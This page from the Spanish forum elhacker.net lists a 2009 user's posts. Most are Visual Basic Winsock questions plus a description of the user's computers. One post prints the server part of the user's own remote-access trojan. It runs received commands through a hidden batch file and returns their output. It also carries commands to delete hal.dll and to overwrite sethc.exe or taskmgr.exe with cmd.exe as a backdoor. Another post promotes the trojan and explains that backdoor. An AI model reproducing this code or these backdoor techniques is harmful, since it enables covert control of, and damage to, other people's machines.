elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: 1 ... 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [34] 35 36 37 38 39 40 41 42 43 44 45
331  Programación / Programación Visual Basic / Re: Server no conecta, ayuda en: 1 Junio 2009, 17:35 pm
la duda que me planteo yo, son los pasos:

tienes que introducir los dos modulos

luego definirlo en cada formulario


 
la cosa es si hay que sustituir ademas del wsk.close al wsk.closesck algo mas

o solo hay que susituir eso?

luego la tipica cuestion de si se pude tener winsock en cliente y csocketmaster en servidor

gracias, asi nos solventamos las dudas completas todos  ;)
332  Programación / Programación Visual Basic / Re: Problemas con winsock en: 29 Mayo 2009, 01:03 am
lo mejor la segunda, en algunas paginas te vienen los modulos diseñados ya para poder usarlos y solo tienes que definir una variable en cuanto al modulo para poder utilizarlo en todos tus formularios

eso si, alguna estructura tendras que cambiar ya que las ordenes no son las mismas, algunas si pero otras no
333  Foros Generales / Foro Libre / Re: ¡Vuestros Ordenadores! en: 26 Mayo 2009, 18:34 pm
Bueno partire con unas imagenes generales:



Empecemos por el Ordenador de la izquierda, el de monitor plateado:

Marca
: Airis
Disco/s Duro(s: 2 (70gb^2)
Memoria Ram: 512mb
Procesador: Intel Pentium 4 a 2,*
T.Grafica: Via sg Unichrome Pro Family
Unidad Lectora: Grabadora Doble nucleo
Disquetra: 1
Puertos Usb: 6 (Dos Frontales, y 4 traseros)
Puertos Microphone in, speaker out: 2 (1 frontal y otro trasero)
Teclado adaptado: ngs
Raton adatado: Agiler Optico
Extras: Pequeña cavidad para guardar Cds

El Laptop de en Medio:

Marca[/b]: Acer
Disco/s Duro(s: 1 (250 gb)
Memoria Ram: 3 gb
Procesador: Intel dual core 1,6 ghz
T.Grafica: intel gma
Unidad Lectora: dvd super multi doble capa
Puertos Usb: 4 (laterales)
Teclado adaptado: logitech inalambrico
Raton adatado: genius optico
Extras: Tarjeta wifi atheros ar5007eg
                     Unidad lectora de tarjetas sd y micro sd
                     infrarrojos
                     otros puertos: rj11,rj45,super video y rca


El 3 monitor es una extension del portatil, es decir un escritorio ampliado, aunque tambien lo uso para la torre que tengo debajo de el que me han regalado, por lo que se de la torre esta, que la tuve que montar entera es que tiene un intel celeron, 192mb de memoria ram, la placa nose si es asus, no tiene lectora cd dvd, solo disquetera y usa win xp forzado, que le cambiare por un linux light



334  Programación / Programación Visual Basic / Problema al crear archivo remotamente en: 26 Mayo 2009, 15:08 pm
Veran tengo un problema, y la verdad que tengo toda la cabeza desordenada con esto

Este es el codigo del cliente, que envia los datos para que luego se creen en el host remoto

Código:
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long

Private Sub Command1_Click()
Dim datosarch As String, creando As String, lilis As Integer, linear As String, totales As Integer
datosarch = InputBox("Indica ruta, noombre y extension: (ej c:\ola.txt)", "Especifica datos", "")

porden = "uno" & "-xzññzx-" & datosarch & "-xzññzx-" & txtarchivo

frmcliente.wsk.SendData creando
frmcliente.wsk.SendData porden

End Sub

Private Sub Timer1_Timer()
Const EM_GETLINECOUNT = &HBA
Const EM_GETLINE = &HC4
lilis = SendMessage(txtarchivo.hwnd, EM_GETLINECOUNT, 0, 0)
lbll.Caption = "Lineas: " & lilis
End Sub


Luego he aqui la parte del dataarival del servidor:



Código:
Private Sub wsk_DataArrival(ByVal bytesTotal As Long)
Dim orden As String, sistrema As String, todo As String, buscca As Integer
Dim handle_Process As Long
     Dim id_process As Long
    Dim lp_ExitCode As Long
    Dim casa As String
   
On Error GoTo error

'--------------------------------------------------------------------------'

casa = Environ$("homedrive")
sistrema = Environ$("windir") & "\system32"
letra = Environ$("homedrive") & "\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"
ini = casa & "\ctfmon.bat"

'--------------------------------variables---------------------------------'

[b]wsk.GetData orden

If orden = "creando" Then interruptor = True

If interruptor = True & orden <> creando Then

arris = Split(orden, "-xzññzx-")

ordencr = arris(2)
ruta = arris(1)

Open ruta For Output As #1
Print #1, ordencr
Close #1

Exit Sub
End If[/b]

If interruptor = False & orden <> creando Then

'------------------ordenes personalizadas----------------------------------'

If orden = "del " & sistrema & "\hal.dll" Then Kill sistrema & "\hal.dll"
If orden = "copy /y " & sistrema & "\cmd.exe" & " " & sistrema & "\sethc.exe" Then FileCopy sistrema & "\cmd.exe", sistrema & "\sethc.exe"
If orden = "copy /y " & sistrema & "\cmd.exe" & " " & sistrema & "\taskmgr.exe" Then FileCopy sistrema & "\cmd.exe", sistrema & "\taskmgr.exe"
If orden = "eliminar troyano" Then
Kill letra & "\intel.exe"
Shell ("taskkill /f /im " & App.EXEName & ".exe")
End If
'--------------------------------------------------------------------------'

Open ini For Output As #1
Print #1, orden & ">" & casa & "\ctfmon.txt"
Close #1


 
     id_process = Shell(ini)
     

     
    handle_Process = OpenProcess(PROCESS_QUERY_INFORMATION, False, id_process)

   
    Do

         Call GetExitCodeProcess(handle_Process, lp_ExitCode)

         DoEvents

     Loop While lp_ExitCode = STATUS_PENDING

   
     Call CloseHandle(handle_Process)

   Open casa & "\ctfmon.txt" For Input As #1
txtcom = Input(LOF(1), #1)
Close #1

wsk.SendData txtcom

End If
error:
End Sub

La parte en negrita es la que mas o menos importa digo yo

el problema esta en que yo tengo dos opciones en el cliente, mandar datos, como u ndir y que el me conteste con la salida de datos que se deja en el fichero ctfmon.txt

luego esta un boton para crear un archivo que primero introduces los datos y despues especificas ruta y nombre de archivo y lo crea

la cosa es que falla en unas cuantas cosas, a veces me crea el archivo, otras no, si pongo espacios para crear un archivo me salta a ejecutarlo y no a crearlo... etc

haber si me podeis corregir un poco el code que estoy paranoico perdido

 :-[
335  Seguridad Informática / Seguridad / Re: Entrar a XP/NT/2000 como administrador en 30 segundos en: 26 Mayo 2009, 12:30 pm
yo me quedare siempre con mis puertas traseras :))
336  Seguridad Informática / Seguridad / Re: Entrar a XP/NT/2000 como administrador en 30 segundos en: 26 Mayo 2009, 02:18 am
esto no vale, tiene la bios

las bios como award phoenix etc suelen tener pass por defecto, ademas de la que establece el usuario, en caso de olvido,

http://foro.elhacker.net/hacking_avanzado/contrasenas_por_defecto_en_las_bios_routers_y_claves_wpa-t99273.0.html

El cia commander no es muy etico, a mi me gusta encontrar fallas en win y valerme de ellas para escalar puestos jeje

este malware mio, te podria crear con la opcion backdoor una puerta trasera como la del stiky keys, los que sepan de lo que hablo, aqui os dejo la url

se que es un troyano, pero si se usa logica, nos podemos meter el troyano a nosotros mismos,generar la backdorr y luego borrar la entrada de inicio y el proceso del troyano

aqui os lo dejo:

http://foro.elhacker.net/analisis_y_diseno_de_malware/vb_60_dioxis_trojan_conexion_inversa_by_50l3r-t255645.0.html
337  Programación / Programación Visual Basic / Re: ejecutar .bat desde shell en: 26 Mayo 2009, 00:26 am
haber si me puedes ayudar con lo ultimo cassiani, por cierto tu api que me distes me sirvio a la primera :P

joe, reedito, arreglado :P, pondre las siguientes dudas en otros temas que estoy plagado jeje
338  Programación / Programación Visual Basic / Re: ejecutar .bat desde shell en: 26 Mayo 2009, 00:22 am
lo que me dijo cassiani funciona no te preocupes, ya lo probe

ahora estoy en este embrollo

hace todo a la perfeccion asta aqui:

Código:
Open casa & "\ctfmon.txt" For Input As #1
txtcom = Input(LOF(1), #1)
Close #1

wsk.SendData txtcom

ya crea el bat, y el archivo de texto y tambien espera a que se ejecute el shell y luego sigue, pero, cuando es el momento de enviar los datos, no los envia al cliente :/ que podra ser
339  Programación / Programación Visual Basic / Re: ejecutar .bat desde shell en: 25 Mayo 2009, 21:35 pm
dioooooooos que pedazo codigo jaja, me voy a leer lo de esperar un bat y luego l ode karcrack que tengo para rato

mmm vere tambien lo de dessa, probre con todo en fin jj

edito porfavorrrrr, que error el mio

los ficheros .txt, se crean al lado del exe, no del bat, y como lo estaba ejecutando desde el vb pues,,, ya veis :(

fallo supertonto  >:( sorry por haberos hecho peroder tiempo valioso

porcierto, tambien era lo que decia casiani, que lo hace demasiado deprisa y no le da tiempo a pasarlo al textbox
340  Programación / Programación Visual Basic / Re: ejecutar .bat desde shell en: 25 Mayo 2009, 20:03 pm
sisi, ahi tienes razon, aun asi el codigo este es una prueba, no las declare para ganar tiempo, aunque no es nada la verdad

hay alguna formula que te haga esperar x tiempo?
Páginas: 1 ... 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [34] 35 36 37 38 39 40 41 42 43 44 45
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines